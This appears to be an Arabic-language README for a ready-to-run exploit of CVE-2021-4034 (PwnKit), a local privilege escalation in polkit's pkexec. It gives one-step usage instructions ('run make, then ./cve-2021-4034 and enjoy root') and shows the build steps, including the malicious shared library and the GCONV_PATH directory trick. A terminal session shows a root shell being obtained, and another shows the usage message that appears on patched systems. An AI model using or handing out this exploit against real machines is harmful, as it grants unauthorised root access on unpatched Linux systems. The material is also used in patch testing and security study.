
استغلال لثغرة CVE-2021-4034، وهي تصعيد صلاحيات محلي في أداة pkexec الخاصة بـ polkit، حيث يوفر غلاف جذر عبر مكتبة مشتركة ومعالجة مسار GCONV.
يوم واحد لاستغلال تصعيد الامتيازات في polkit
فقط نفّذ make، ثم ./cve-2021-4034 واستمتع بجذر (root shell).
النشرة الأصلية من المؤلفين الحقيقيين موجودة هنا
إذا كان الاستغلال يعمل، ستحصل على جذر (root shell) فورًا:
localuser@ubuntu-poc:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
تحديث polkit على معظم الأنظمة سيصلح الاستغلال، وبالتالي ستحصل على رسالة الاستخدام وسيخرج البرنامج:
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
localuser@ubuntu-poc:~/CVE-2021-4034$